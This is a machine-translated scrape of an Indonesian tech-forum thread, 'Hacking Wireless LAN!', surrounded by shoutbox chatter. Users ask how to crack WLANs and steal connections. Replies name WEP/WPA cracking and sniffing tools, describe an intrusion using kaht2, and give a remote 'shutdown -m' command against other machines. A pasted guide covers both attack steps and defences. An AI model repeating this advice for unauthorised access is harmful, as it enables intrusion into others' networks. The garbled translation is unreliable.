<br>toms_momo <br>Yesterday at 10:31:02 PM <br>quiet mas dab ... <br>Tito Haga
<br>Yesterday at 07:51:15 PM <br>wakakakakaka <br>alexander_corvinus <br>Yesterday at
06:37:00 PM <br>wew do that &#39;an: p <br>B.U.G.S <br>Yesterday at 05:05:04 PM <br>@
Tito Haga <br>nge&#39;s iso-move nggo redirection tp ga, ga dadi metu MOVED .. MOVED ..
MOMED marai ngunu wae .. wakakaka .. <br>coolwin <br>Yesterday at 04:58:26 PM <br>BEST
UPDATE CHECK today CF KILL !!!!! I&#39;M IN RANK 2 wakakakakaka <br>Tito Haga
<br>Yesterday at 02:51:11 PM <br>@ BUGS <br>hahahaha ... .. bar Tangi sori2 turu ngono kui
ngemoved yes ... haha <br>donkey <br>Yesterday at 01:57:41 PM <br>wakakakaka ....
<br>blackshield ™ <br>Yesterday at 11:54:06 PM <br>cilukkkkkkkk <br>baaaaaaa ...
<br>B.U.G.S <br>Yesterday at 10:39:35 PM <br>Jove, moved ming kok isine kabeh kie ..? nek
nge-mending move topic lawas not dikei redirection ga kang .. <br>Tito Haga <br>Yesterday at
08:26:27 PM <br>wakakakakka ... means the same boat <br>sadnux <br>Yesterday at 08:20:42 PM
<br>its not about bersih2, tp itu lho yg in sign writing about college yg <br>parent often say kek
gitu pas kl ane marahin T_T <br>Tito Haga <br>Yesterday at 08:13:04 PM <br>Hahahahaha ...
yes ... maap2 technical error had bersih2 le ngemovednya wrong ... so kamr jugah:: <br>sadnux
<br>Yesterday at 08:09:47 PM <br>beautiful morning .. tp yg ketendang same directly pack
signaturenya ditto <br>wakakakak <br>Tito Haga <br>Yesterday at 07:56:09 PM <br>morning
kang <br>sadnux <br>Yesterday at 07:47:53 PM <br>met pagi all <br>Tito Haga <br>Yesterday at
06:34:29 PM <br>weh ... kang banner onlen <br>Panji <br>Yesterday at 06:13:51 PM <br> miss u
all ... <br>Tito Haga <br>Yesterday at 05:30:56 PM <br>Ndalu gang <br> <br>Show last 200 <br>
<br>Polling <br>Lates Post <br>Sell fingerboard where y. .. by vheebhee [Today at 03:46:23 AM]
<br>Tanya Mo. .. More Niy Can ... by Genah_wae [Today at 03:20:28 AM] <br>help me by
botaxalim [Today at 02:04:50 AM] <br>EXPLANATION PLEASE wearing ... by botaxalim [Today
at 01:54:06 AM] <br>Update March 5, 2010 Cross ... by botaxalim [Today at 01:36:16 AM]
<br>[ASK] Building Network by botaxalim [Today at 01:28:59 AM] <br>Asus ROG Series 890FX
Mot ... by Hazzan [Today at 12:24:06 AM] <br>guitar hero pc pake maen ... by SYXXness
[Yesterday at 11:30:42 PM] <br>- Post Works 3D Made An ... by B.U.G.S [Yesterday at 10:05:46
PM] <br>(WTA) Cooling Procie Unru ... by kocek99 [Yesterday at 07:51:45 PM] <br>[WTA]
915GAV Intel 3x Tit ... by masYogo [Yesterday at 05:45:43 PM] <br>(Unlocking Test) Biostar ...
by sandlewood [Yesterday at 01:37:37 PM] <br>Software audio player by Tito Haga [Yesterday at
07:20:09 PM] <br>Adjust DDR3 you ...!!! by masYogo [Yesterday at 05:18:00 PM] <br>[review]
HaPe Modem &quot;ray ... by frozr_man [Yesterday at 05:08:18 PM] <br>AMD VS INTEL
&lt;FIGHT! &gt; By didit_catro &#39;[Yesterday at 04:15:54 PM] <br>[Ask About] proci
Warranty ... by sadnux [March 04, 2010, 11:03:15 PM] <br>[WTA] How to mbungkam Fan B. .. by
SYXXness [March 04, 2010, 08:45:18 PM] <br>Mainboard 890gx / 890fx by frozr_man [March
04, 2010, 08:44:57 PM] <br>Creativity Adu Wallpaper by donkey [March 04, 2010, 07:16:40 PM]
<br>Statistic <br>Members <br>Total Members: 10,884 <br>Latest: Ricko <br>Stats <br>Total
Posts: 102,876 <br>Total Topics: 7713 <br>Online Today: 56 <br>Online Ever: 448 <br>(April 04,
2008, 05:10:06 AM) <br>Users Online <br>Users: 15 <br>Guests: 61 <br>Total: 76
<br>MARJ1NAL <br>Gytautas <br>paulpierce <br>myscreen <br>AKA2 <br>citraxeena
<br>best <br>brewox <br>arveds <br>Aero <br>B.U.G.S <br>Ricko <br>damonrulz <br>coolwin
<br>aikendeva <br>Visitor MAP <br> <br> <br> <br>Hot
http://www3.clustrmaps.com/counter/maps.php?url=http://www.hyem.org NEWS <br>The
Unordinary Community&gt; Forum&gt; == SOFTWARE ==&gt; Security (Moderator: Light)&gt;
Hacking Wireless LAN! <br>Pages: [1] Go Down «previous next» <br> Print <br> <br> Author
Topic: Hacking Wireless LAN! (Read 6005 times) <br> <br>berang_berang <br>Trade Count: (0)
<br>[POWERED] <br> <br> <br>Posting Quality: 0 <br> Offline <br> <br>Last Login: May 24,
2006, 10:28:54 PM <br>Posts: 57 <br>HY $ 0.00 credits <br> <br>View Inventory <br>Send
Money to berang_berang <br>Topic starter <br> <br> Hacking Wireless LAN! <br>«On: March
09, 2006, 01:07:46 PM» <br> <br>--------------------------------------------------
------------------------------ <br>Kalo we want to hack the standard w.LAN tools2 what we wrote
butuhin, and how gmana? <br> <br>Gmana way in and gmana bobolnya way? <br> <br>Trus
kalo yg pake linux tools recommended what? kalo windows what? <br>Kalo mau nyolong gmana
Internet connection? <br> <br> <br> <br> Logged <br> <br> <br> <br>Bryant <br>Guest
<br>Trade Count: (0) <br> Re: Hacking Wireless LAN! <br>«Reply # 1 on: March 13, 2006,
01:02:12 PM» <br> <br>-------------------------------------------------- ------------------------------
<br>kismet for netstumbler &amp; nyari AP or SSID yg buat airsnort active &amp; ngecrack
password ... <br>manual installation &amp; tutorial googling aja. Jgn lupa kalo successful
password share ........... <br> <br> Logged <br> <br> <br> <br>The Unordinary Community Re:
Hacking Wireless LAN! <br>«Reply # 1: March 13, 2006, 01:02:12 PM» <br>
<br>-------------------------------------------------- ------------------------------ <br> <br> <br> Logged
<br> <br> <br> <br>RooTrick <br>[Community Member] <br>Trade Count: (0)
<br>[POWERED] <br> <br> <br>Posting Quality: 0 <br> Offline <br> <br>Last Login:
September 10, 2009, 11:04:13 PM <br>Posts: 93 <br>HY $ 36.00 credits <br> <br>View Inventory
<br>Send Money to RooTrick <br> <br> <br> Re: Hacking Wireless LAN! <br>«Reply # 2 on:
March 19, 2006, 08:13:19 PM» <br> <br>--------------------------------------------------
------------------------------ <br>download dmn tuh om? <br>trus kalo uda dapet makes source code
applications na na gmn? <br>thx bgt ... <br> : mrgreen: <br> <br> Logged <br>
<br>-------------------------------------------------- ------------------------------ <br>Let the world revolves
around me ... <br> <br> <br>densinyo <br>[Community Member] <br>Trade Count: (0)
<br>[Enthusiast] <br> <br> <br>Posting Quality: 0 <br> Offline <br> <br>Last Login: February
28, 2010, 12:54:59 PM <br>Posts: 133 <br>HY $ 353.00 credits <br> <br>View Inventory
<br>Send Money to densinyo <br> <br> <br>-=- environment ranging from self-=- <br> <br>
<br> Re: Hacking Wireless LAN! <br>«Reply # 3 on: March 20, 2006, 08:15:01 PM» <br>
<br>-------------------------------------------------- ------------------------------ <br>DL dmn tuh ... boleh
dong requested the link ... <br> <br> Logged <br> <br>--------------------------------------------------
------------------------------ <br>T-Force 550! Athlon64 X2 4000 +! Adata 2gb! AcBel 400w! WDC
500GB!
Pioneer DVD RW! Lite-On DVD! A4Tech <br>-=- environment ranging from self-=-
<br>081-5612-7812 <br> <br>You are not allowed to view links. <br>Register or Login <br>You
are not allowed to view images. <br>Please register or login <br> <br> <br>The Unordinary
Community Re: Hacking Wireless LAN! <br>«Reply # 3: March 20, 2006, 08:15:01 PM» <br>
<br>-------------------------------------------------- ------------------------------ <br> <br> <br> Logged
<br> <br> <br> <br>Bryant <br>Guest <br>Trade Count: (0) <br> Re: Hacking Wireless LAN!
<br>«Reply # 4 on: March 21, 2006, 03:09:47 PM» <br>
<br>-------------------------------------------------- ------------------------------ <br>I have lg nih project,
make antenna can make WiFinya YKPN shoot, there have any experience yg ga tin bkin antenna?
<br>Search tool material n ada yg tau ga? <br>This tutorial is reply pd sdikit interest: <br>You are
not allowed to view links. <br>Register or Login <br> <br> Logged <br> <br> <br> <br>MAS
<br>[OprekPC] <br>Trade Count: (0) <br>[POWERED] <br> <br> <br>Posting Quality: 0 <br>
Offline <br> <br>Last Login: April 19, 2008, 06:18:17 PM <br>Posts: 57 <br>HY $ 221.00 credits
<br> <br>View Inventory <br>Send Money to MAS <br> <br> <br> Re: Hacking Wireless LAN!
<br>«Reply # 5 on: August 16, 2006, 02:28:36 AM» <br>
<br>-------------------------------------------------- ------------------------------ <br>This follow aja deh ...
You are not allowed to view links. <br>Register or Login sdh was too old Linux (Auditor following
sdh n dah find her hard to replace Backtrack) tp sure deh, klo you are able to implement, easy
wuiiih banged. <br> <br>one more thing .... wifi chipset election jg jd diliat pertimbangan.bisa here
<br> <br>You are not allowed to view links. <br>Register or Login <br> <br>klo for windows, in
addition netstumbler pake aja WDRIVER and AirSnort.jamin isa (klo cuman make WEP) tp klo dah
target MAC auth make it give up deh mas ... hehehe, before there isa yg <br> <br> Logged <br>
<br>-------------------------------------------------- ------------------------------ <br>You are not allowed to
view links. <br>Register or Login <br>OprekPC ..:::.. Mods - Tweak - Overclock PC <br>
<br>You are not allowed to view links. <br>Register or Login <br>Warungplus <br> <br>
<br>still_ndESo <br>NBP <br>[Community Member] <br>Trade Count: (1) <br>[Hyper] <br>
<br> <br>Posting Quality: 8 <br> Offline <br> <br>Last Login: September 20, 2008, 02:39:26 PM
<br>Posts: 1103 <br>HY $ 444.00 credits <br> <br>View Inventory <br>Send Money to
still_ndESo <br> <br> <br>No Body&#39;s Perfect <br> <br> <br> Re: Hacking Wireless LAN!
<br>«Reply # 6 on: December 13, 2006, 01:58:02 PM» <br>
<br>-------------------------------------------------- ------------------------------ <br>gini bro, I&#39;m on
campus pake pake internet.tp facility via pc connected via LAN. trus time ta &#39;clay found in the
network is also connected via laptop2 wifi. I liatnya pake cmd, trus ta &#39;type &quot;net
view&quot; out tu laptop2nya. can ta &#39;not hacked from the pc I pake? <br>thanks ya ... (just
curious, do not want to harm everybody) <br> <br> Logged <br> <br> <br>
<br>psyCHo_L061c <br>Trade Count: (0) <br> <br> <br>Posting Quality: 0 <br> Offline <br>
<br>Last Login: January 09, 2007, 09:24:31 PM <br>Posts: 2 <br>HY $ 0.00 credits <br>
<br>View Inventory <br>Send Money to psyCHo_L061c <br> <br> Re: Hacking Wireless LAN!
<br>«Reply # 7 on: January 08, 2007, 04:52:37 PM» <br>
<br>-------------------------------------------------- ------------------------------ <br>bisa aja om mah .....
hehehehe it easy, if u could&#39;ve and taw gimana cara fingerprinting and foot printingnya oms
<br>trus taw a bug we&#39;re looking for security holes or it is what there do ,,,...... hehehehehehe
so i am just newbie <br> <br> Logged <br> <br> <br> <br>still_ndESo <br>NBP
<br>[Community Member] <br>Trade Count: (1) <br>[Hyper] <br> <br> <br>Posting Quality: 8
<br> Offline <br> <br>Last Login: September 20, 2008, 02:39:26 PM <br>Posts: 1103 <br>HY $
444.00 credits <br> <br>View Inventory <br>Send Money to still_ndESo <br> <br> <br>No
Body&#39;s Perfect <br> <br> <br> Re: Hacking Wireless LAN! <br>«Reply # 8 on: January 26,
2007, 08:04:29 PM» <br> <br>-------------------------------------------------- ------------------------------
<br>Quote from: psyCHo_L061c on January 08, 2007, 04:52:37 PM <br>bisa aja om mah .....
hehehehe it easy, if u could&#39;ve and taw gimana cara fingerprinting and foot printingnya oms
<br>trus taw a bug we&#39;re looking for security holes or it is what there do ,,,...... hehehehehehe
so i am just newbie <br> <br>well, I mbok diajarin lha mas ... I still underneath a newbie
<br>hehee <br> <br> Logged <br> <br> <br> <br>The Unordinary Community Re: Hacking
Wireless LAN! <br>«Reply # 8: January 26, 2007, 08:04:29 PM» <br>
<br>-------------------------------------------------- ------------------------------ <br> <br>Order:
hyem_toko <br> <br> Logged <br> <br> <br> <br>silverx <br>Trade Count: (0)
<br>[Enthusiast] <br> <br> <br>Posting Quality: 1 <br> Offline <br> <br>Last Login: June 18,
2008, 02:50:14 PM <br>Posts: 121 <br>HY $ 120.00 credits <br> <br>View Inventory <br>Send
Money to silverx <br> <br> <br>Enjoy Life It&#39;s ...... <br> <br> <br> Re: Hacking Wireless
LAN! <br>«Reply # 9 on: March 17, 2007, 11:41:56 AM» <br>
<br>-------------------------------------------------- ------------------------------ <br>These tools can be
useful for browsing sangant increasingly entering a network, Cain And Abel via google search .... aj
certainly can, install and run, there you can open companies that adapada network, although
worgroupnya different ........................... <br>I was confused for existing antenna tutorinya above,
connect to port ake PCnya hell? pake serial? ato pake USB?? his antennae cuman doang
ditutorial !!!!!!!!!!! 1 <br> <br> Logged <br> <br>--------------------------------------------------
------------------------------ <br>&quot;Have Something In Need, Not according Desire &quot;....
<br> <br> <br>Arwan <br>Trade Count: (0) <br>Interest .. <br> <br> <br>Posting Quality: -1
<br> Offline <br> <br>Last Login: June 11, 2007, 11:16:42 PM <br>Posts: 11 <br>HY $ 4.00
credits <br> <br>View Inventory <br>Send Money to Arwan <br> <br> <br>never ending learning
<br> <br> <br> Re: Hacking Wireless LAN! <br>«Reply # 10 on: April 07, 2007, 06:23:01 AM»
<br> <br>-------------------------------------------------- ------------------------------ <br>Netstumbler,
Kismet, and Aeroneet / aeropeek <br> <br>its stuf ... <br>kismet make a reply to its plasticity mac
address he kalo ga active we can use to change the MAC address of our ... or you want to try
&quot;man in the middle&quot;? <br> <br>aeropeek can open either AP WEP WPA reply ... (not
nyoba) <br>ASCII is usually encrypted so we look for similarities alone ... and may be divided into
4 atao like ASCII codenya&#39;ll see ... <br>This can also be used for the man in the middle attack
<br> <br>There is no reply aeropeek MBO software I shared ... my software got damaged jeefo,
and it is the master .... kalo download more males (trial) <br> <br>cmiiw <br> <br> Logged <br>
<br>-------------------------------------------------- ------------------------------ <br>i have my own
journey <br> <br> <br>lelahana <br>Trade Count: (0) <br> <br> <br>Posting Quality: 0 <br>
Offline <br> <br>Last Login: November 10, 2007, 04:43:39 PM <br>Posts: 4 <br>HY $ 1.00
credits <br> <br>View Inventory <br>Send Money to lelahana <br> <br> Re: Hacking Wireless
LAN! <br>«Reply # 11 on: April 09, 2007, 04:05:09 PM» <br>
<br>-------------------------------------------------- ------------------------------ <br>sadisssssss ....
<br>wah .... kckckckckckc linings semuanyajago .. <br>but the reply requested diajarin way, there
are going ga? <br>jadi pengen nih ... curious buanget ga tau .... but how ... <br>ajarin dunks .. :
&#39;(:&#39; (: &#39;(:&#39; (: &#39;(:&#39; ( <br> <br> Logged <br> <br> <br>
<br>arbangun <br>GamerZ, Coder &amp; Carding <br>Trade Count: (0) <br>[Enthusiast] <br>
<br> <br>Quality posts: 2 <br> Offline <br> <br>Last Login: October 19, 2009, 02:03:55 PM
<br>Posts: 130 <br>HY $ 40.00 credits <br> <br>View Inventory <br>Send Money to arbangun
<br> <br> <br>ARB&#39;S Coorp <br> <br> <br> Re: Hacking Wireless LAN! <br>«Reply # 12
on: April 13, 2007, 12:52:50 PM» <br> <br>--------------------------------------------------
------------------------------ <br>NUAMBAAAHHIIINN ... waaakaaakaa ..... <br> <br>coba pake
APSniffer <br>trus ethereal (wireshark) <br>ama APsnort <br> <br>tu pake tool, klo ga slh we can
pass ama dpet username for log-on. <br> <br>hmmm ya no more for a computer intruder detection
can try jg nih pake this way <br> <br>Quote <br>== MENDITEKSI NETWORK THROUGH
intruder DOS == <br> <br> <br>BEGIN <br> <br>* INTRODUCTION: Maybe we do not realize
if we play that there diwarnet <br>we are monitoring whether it adminya or prankster who want
<br>steal information from us, so with that I will be a bit trying to see <br>or premises only
mendetiksinya dos command! <br> <br> <br>It turned out there at Dos facility that may we all
forgotten and rarely used <br>command is NETSTAT. Windows provides this command to support
<br>network. Netstat can also be used to see the ip-ip that are connected <br>into our computer.
<br>For that open the dos command you, you know how: d if ga tau nich: <br>- Start&gt; Run&gt;
command.exe [for Win 95/98] <br>- Start&gt; Run&gt; cmd.exe [for a win 2000/XP / nt] <br>then
the command prompt appear deh <br> <br>C: \ WINNT&gt; netstat? <br>Displays protocol
statistics and current TCP / IP network connections. <br> <br>NETSTAT [-a] [-e] [-n] [-s] [-p
proto] [-r] [interval] <br> <br>-a Displays all connections and listening ports.
<br>-e Displays Ethernet statistics. This may be combined with the-s option. <br>-n Displays
addresses and port numbers in numerical form. <br>-p proto Shows connections for the protocol
specified by proto; proto <br>may be TCP or UDP. If used with the-s option to display <br>per-
protocol statistics, proto may be TCP, UDP, or IP. <br>-r Displays the routing table. <br>-s Displays
per-protocol statistics. By default, statistics are <br>shown for TCP, UDP and IP; the-p option may
be used to specify <br>a subset of the default. <br>dedisplays interval selected statistics, Pausing
interval seconds <br>between each display. Press CTRL + C to stop redisplaying <br>statistics. If
omitted, netstat will print the current <br>configuration information once. <br> <br>Now we use
netstat to see the connections that are connected using-a <br> <br>C: \ WINNT&gt; netstat-a
<br>Proto Local Address Foreign Address State <br>TCP me: http me.ladomain.lintasarta.co.id: 0
LISTENING <br>TCP me: epmap me.ladomain.lintasarta.co.id: 0 LISTENING <br>TCP me: https
me.ladomain.lintasarta.co.id: 0 LISTENING <br>TCP me: microsoft-ds
me.ladomain.lintasarta.co.id: 0 LISTENING <br>TCP me: 1025 me.ladomain.lintasarta.co.id: 0
LISTENING <br>TCP me: 1027 me.ladomain.lintasarta.co.id: 0 LISTENING <br>TCP me: 1028
me.ladomain.lintasarta.co.id: 0 LISTENING <br>TCP me: 1071 me.ladomain.lintasarta.co.id: 0
LISTENING <br>TCP me: 1146 me.ladomain.lintasarta.co.id: 0 LISTENING <br>TCP me: 1163
me.ladomain.lintasarta.co.id: 0 LISTENING <br>TCP me: 1253 me.ladomain.lintasarta.co.id: 0
LISTENING <br>TCP me: 1261 me.ladomain.lintasarta.co.id: 0 LISTENING <br>TCP me: 1288
me.ladomain.lintasarta.co.id: 0 LISTENING <br>TCP me: 1306 me.ladomain.lintasarta.co.id: 0
LISTENING <br>TCP me: 1314 me.ladomain.lintasarta.co.id: 0 LISTENING <br>TCP me: 5101
me.ladomain.lintasarta.co.id: 0 LISTENING <br>TCP me: epmap 10.22.1.236:4504 TIME_WAIT
<br>TCP me: netbios-ssn me.ladomain.lintasarta.co.id: 0 LISTENING <br>TCP me: 1071
LAJKTTS02: 1080 ESTABLISHED <br>TCP me: 1288 IS ~ HRS: microsoft-ds ESTABLISHED
<br>TCP me: 1306 GREENGUY: microsoft-ds ESTABLISHED <br>UDP to: 1134 *.* <br>
<br>the pc name is the port used for connection. <br>netstat on my office computer using ip using
dhcp. <br>Here we can see anyone who wrote a computer connected in our <br>or with a more
obvious example of this. For more details, I will try <br>infiltrate other people&#39;s computers by
using kaht2: d <br>and I&#39;m able to infiltrate. <br> <br>C: \ WINDOWS \ system32&gt;
netstat-a <br>Active Connections <br> <br>Proto Local Address Foreign Address State <br>TCP
khs_2003: epmap khs_2003: 0 LISTENING <br>Khs_2003 TCP: microsoft-ds khs_2003: 0
LISTENING <br>TCP khs_2003: 1025 khs_2003: 0 LISTENING <br>TCP khs_2003: 1063
khs_2003: 0 LISTENING <br>TCP khs_2003: 1093 khs_2003: 0 LISTENING <br>TCP khs_2003:
1136 khs_2003: 0 LISTENING <br>TCP khs_2003: 1138 khs_2003: 0 LISTENING <br>TCP
khs_2003: 5000 khs_2003: 0 LISTENING <br>TCP khs_2003: 43,715 khs_2003: 0 LISTENING
<br>TCP khs_2003: epmap 10.21.3.17:3628 TIME_WAIT &lt;------ 1 <br>TCP khs_2003: epmap
10.21.3.50:1686 FIN_WAIT_2 &lt;------ 2 <br>Khs_2003 TCP: netbios-ssn khs_2003: 0
LISTENING <br>TCP khs_2003: 1093 10.21.1.18:8080 CLOSE_WAIT <br>Khs_2003 TCP:
ESTABLISHED 1136 10.21.1.18:8080 <br>Khs_2003 TCP: ESTABLISHED 1138
10.21.1.18:8080 <br>TCP khs_2003: 11,196 khs_2003: 0 LISTENING <br>TCP khs_2003: 43715
10.21.3.50:1687 ESTABLISHED &lt;------ 3 <br>UDP khs_2003: microsoft-ds *: * <br>UDP
khs_2003: isakmp *: * <br>Khs_2003 UDP: 1028 *: * <br>Khs_2003 UDP: 1035 *: *
<br>Khs_2003 UDP: ntp *: * <br>Khs_2003 UDP: netbios-ns *: * <br>Khs_2003 UDP: netbios-
dgm *: * <br>Khs_2003 UDP: 1900 *: * <br>UDP khs_2003: 13715 *: * <br>UDP khs_2003:
61804 *: * <br>Khs_2003 UDP: ntp *: * <br>Khs_2003 UDP: 1032 *: * <br>Khs_2003 UDP:
1036 *: * <br>Khs_2003 UDP: 1107 *: * <br>Khs_2003 UDP: 1134 *: * <br>Khs_2003 UDP:
1900 *: * <br>This computer is in susupi by I look nya.pada port number 3 is <br>kaht2 open ports
to a computer sploit know. <br>and how we how we are to know the name of the computer being
<br>infiltrate into our computer. Use nbtstat-a <br>C: \ WINDOWS \ system32&gt; nbtstat-a [ip]
<br>C: \ WINDOWS \ Syetem32&gt; nbtstat-a 10.21.3.50 <br>Heart: <br>Node Ipaddress:
[10.21.3.50] Scope Id: [] <br> <br>NetBIOS Remote Machine Name Table <br> <br>Name Type
Status <br>--------------------------------------------- <br>ME &lt;00&gt; UNIQUE Registered
<br>ME &lt;20&gt; UNIQUE Registered <br>Workgroup &lt;00&gt; GROUP Registered
<br>Workgroup &lt;1E&gt; GROUP Registered <br>ME &lt;03&gt; UNIQUE Registered
<br>Inet ~ Services &lt;1C&gt; GROUP Registered <br>IS ~ ME ..........&lt; 00&gt; UNIQUE
Registered <br> <br>MAC Address = 00-60-08-29-37-48 <br> <br>Take a look at it ip 10.21.3.50
pc name is me, and he join the workgroup. <br>We can make a peep surprised we were to use that
facility netsend <br>only in a win 2000/XP or nt. <br> <br>C: \ WINNT&gt; net send [ip / pc
name] [message] <br> <br>Actually there&#39;s more fasilitas2 dos that can be used for fun <br>
<br>or reply to idle moment nigh pake try this formula <br> <br> <br>Quote <br>taw for the host
name of the destination computer .. pake scans can also be angry. <br>deh after that type in the
command prompt eg: <br>c: / shutdown-s-f-m \ \ abcd-t 20 <br>tu gone in 20 seconds, the client
computer will shutdown .. violence ... : &#39;( <br> <br>«Last Edit: April 13, 2007, 12:55:48 PM
by arbangun» Logged <br> <br>-------------------------------------------------- ------------------------------
<br>E2140 @ 3.2 Ghz | Mobo Biostar 945G Micro 775SE Ext | A-Data 2x1GB 800 PC6400 |
LiteOn DVD-RW | HIS X700Pro IceQ 256/128MB PCIe | LG LCD monitors 21 &quot; <br>You
are not allowed to view images. <br>Please register or login <br>You are not allowed to view links.
<br>Register or Login <br>You are not allowed to view images. <br>Please register or login <br>
<br> <br>Arwan <br>Trade Count: (0) <br>Interest .. <br> <br> <br>Posting Quality: -1 <br>
Offline <br> <br>Last Login: June 11, 2007, 11:16:42 PM <br>Posts: 11 <br>HY $ 4.00 credits
<br> <br>View Inventory <br>Send Money to Arwan <br> <br> <br>never ending learning <br>
<br> <br> Re: Hacking Wireless LAN! <br>«Reply # 13 on: April 14, 2007, 04:22:42 AM» <br>
<br>-------------------------------------------------- ------------------------------ <br> lho kalo mas remote
computer system of his victim&#39;s ga ga diaktifin can shutdown the victim with the command C:
\ shutdown .... cmiiw <br> <br>yup, ethereal function read (read: capture) a message or data that
flows on the network, so the current data flow can be seen, what is opened, what data is sent if the
email, myspace or something, but can not seem to pass data https or secure socket layer, fix if
I&#39;m wrong <br> <br>«Last Edit: April 14, 2007, 04:54:26 PM by Arwan» Logged <br> <br>
<br> <br>arbangun <br>GamerZ, Coder &amp; Carding <br>Trade Count: (0) <br>[Enthusiast]
<br> <br> <br>Quality posts: 2 <br> Offline <br> <br>Last Login: October 19, 2009, 02:03:55 PM
<br>Posts: 130 <br>HY $ 40.00 credits <br> <br>View Inventory <br>Send Money to arbangun
<br> <br> <br>ARB&#39;S Coorp <br> <br> <br> Re: Hacking Wireless LAN! <br>«Reply # 14
on: April 16, 2007, 04:13:39 PM» <br> <br>--------------------------------------------------
------------------------------ <br>More from yesterday ..... ADDITIONAL PAKE PInter BIAR BHS.
ENGGRIS YES ... <br> <br>Wireless Hacking Tools <br> <br>Anyone interested in Gaining a
deeper knowledge of wireless security and Exploiting vulnerabilities will need a good set of base
tools with which to work. Fortunately, there are an Abundance of free tools available on the
Internet. This list is not meant to be comprehensive in nature but rather to provide some general
guidance on recommended tools to build your toolkit. <br> <br> <br>Finding Wireless Networks
<br> <br>Locating a wireless network is the first step in trying to exploit it. There are two tools that
are commonly used in this regard: <br> <br>Network stumbler aka NetStumbler - This Windows
based tool easily finds wireless signals being broadcast within range - A must have. It also has
ability to determine Signal / Noise info that can be used for site surveys. I actually know of one
highly known public wireless hotspot provider that uses this utility for their site surveys. <br>You
are not allowed to view images. <br>Please register or login <br> <br>You are not allowed to view
links. <br>Register or Login <br>Kismet [url] http://www.kismetwireless.net/Kismet <br>[/ url] -
One of the key functional elements missing from NetStumbler is the ability to display Wireless
Networks that are not broadcasting their SSID. As a potential wireless security expert, you should
Realize that Access Points are routinely broadcasting this info; it just is not being read / deciphered.
Kismet will detect and display SSIDs that are not being broadcast which is very critical in finding
wireless networks. <br> <br>You are not allowed to view images. <br>Please register or login <br>
<br>Attaching to the Found Wireless Network <br> <br>Once you&#39;ve found a wireless
network, the next step is to try to connect to it. If the network is not using any type of authentication
or encryption security, you can simply connect to the SSID. If the SSID is not being broadcast, you
can create a profile with the name of the SSID that is not being broadcast. Of course you found the
non-broadcast SSID with Kismet, right? If the wireless network is using authentication and / or
encryption, you may need one of the following tools. <br> <br>Airsnort - This is a very easy to use
tool that can be used to Sniff and crack WEP keys. While many people bash the use of WEP, it is
certainly better than using nothing at all. Something you&#39;ll find in using this
tool is that it takes a lot of sniffed packets to crack the WEP key. There are additional tools and
strategies that can be used to force the generation of traffic on the wireless network to shorten the
amount of time needed to crack the key, but this feature is not included in Airsnort. <br> <br>You
are not allowed to view images. <br>Please register or login <br> <br>You are not allowed to view
links. <br>Register or Login <br>CowPattyCowPatty <br>- This tool is used as a brute force tool
for cracking WPA-PSK, considered the &quot;New WEP&quot; for home Wireless Security. This
program simply tries a bunch of different options from a dictionary file to see if one ends up
matching what is defined as the Pre-Shared Key. <br> <br>You are not allowed to view images.
<br>Please register or login <br> <br>You are not allowed to view links. <br>Register or Login
<br>ASLeapASLeap <br>- If a network is using LEAP, this tool can be used to gather the
authentication data that is being passed across the network, and these sniffed credentials can be
cracked. LEAP does not protect the authentication like other &quot;real&quot; EAP types, which is
the main reason why LEAP can be broken. <br> <br>You are not allowed to view images.
<br>Please register or login <br> <br>Sniffing Wireless Data <br> <br>Whether you are directly
connected to a wireless network or not, if there is wireless network in range, there is data flying
through the air at any given moment. You will need a tool to be able to see this data. <br>
<br>Ethereal - While there has been much debate on the proper way to pronounce this utility, there
is no question that it is an extremely valuable tool. Ethereal can scan wireless and Ethernet data and
comes with some robust filtering capabilities. It can also be used to Sniff-out 802.11 management
beacons and probes and subsequently could be used as a tool to Sniff-out non-broadcast SSIDs.
<br> <br>You are not allowed to view images. <br>Please register or login <br> <br>You are not
allowed to view images. <br>Please register or login <br> <br>The aforementioned utilities, or
similar ones, will be Necessities in your own wireless security toolkit. The easiest way to become
familiar with these tools is to simply use them in a controlled lab environment. And cost is no
excuse as all of these tools are available freely on the Internet. <br> <br> <br> <br>Protecting
Against These Tools <br> <br> <br>Just as it&#39;s important to know how to utilize the
aforementioned tools, it is important to know best practices on how to secure your Wireless
Network Against these tools. <br> <br>NetStumbler - Do not broadcast your SSID. Ensure your
WLAN is protected by using advanced Authentication and Encryption. <br> <br>Kismet -
There&#39;s really nothing you can do to stop Kismet from finding your WLAN, so Ensure your
WLAN is protected by using advanced Authentication and Encryption <br> <br>Airsnort - Use a
128-bit, not a 40-bit WEP encryption key. This would take longer to crack. If your equipment
supports it, use WPA or WPA2 instead of WEP (may require firmware or software update). <br>
<br>Cowpatty - Use a long and complex WPA Pre-Shared Key. This type of key would have less of
a chance of Residing in a dictionary file that would used to be try and guess your key and / or would
take longer. If in a corporate scenario, do not use WPA with Pre-Shared Key, use a good EAP type
to protect the authentication and limit the amount of incorrect guesses that would take place before
the account is locked-out. If using certificate-like functionality, it could also validate the remote
system trying to gain access to the WLAN and not allow a rogue system access. <br> <br>ASLeap
- Use long and complex credentials, or better yet, switch to EAP-FAST or a different EAP type.
<br> <br>Ethereal - Use encryption, so that anything sniffed would be difficult or nearly impossible
to break. WPA2, which uses AES, is essentially unrealistic to break by a normal hacker. Even WEP
will encrypt the data. When in a Public Wireless Hotspot (which generally do not offer encryption),
use application layer encryption, like Simplite to encrypt your IM sessions, or use SSL. For
corporate users, use IPSec VPN with split-tunneling disabled. This will force all traffic leaving the
machine through an encrypted tunnel that would be encrypted with DES, 3DES or AES. <br> <br>
<br> Logged <br> <br> <br> <br>Jenggo <br>Guest <br>Trade Count: (0) <br> Re: Hacking
Wireless LAN! <br>«Reply # 15 on: April 16, 2007, 10:42:34 PM» <br>
<br>-------------------------------------------------- ------------------------------ <br>Ato okay how fuzzing
<br>This reply is more relaxed, more &#39;polite&#39; .. <br>Yg cmn clearly not useful for
WLAN doang .. <br> <br>full info: You are not allowed to view links. <br>Register or Login <br>
<br> Logged <br> <br> <br> <br>still_ndESo <br>NBP <br>[Community Member] <br>Trade
Count: (1) <br>[Hyper] <br> <br> <br>Posting Quality: 8 <br> Offline <br> <br>Last Login:
September 20, 2008, 02:39:26 PM <br>Posts: 1103 <br>HY $ 444.00 credits <br> <br>View
Inventory <br>Send Money to still_ndESo <br> <br> <br>No Body&#39;s Perfect <br> <br> <br>
Re: Hacking Wireless LAN! <br>«Reply # 16 on: April 18, 2007, 04:04:48 PM» <br>
<br>-------------------------------------------------- ------------------------------ <br>kalo the MAC
address, instead of a software tuh make change MAC address? <br>anyone ever tried blom? a good
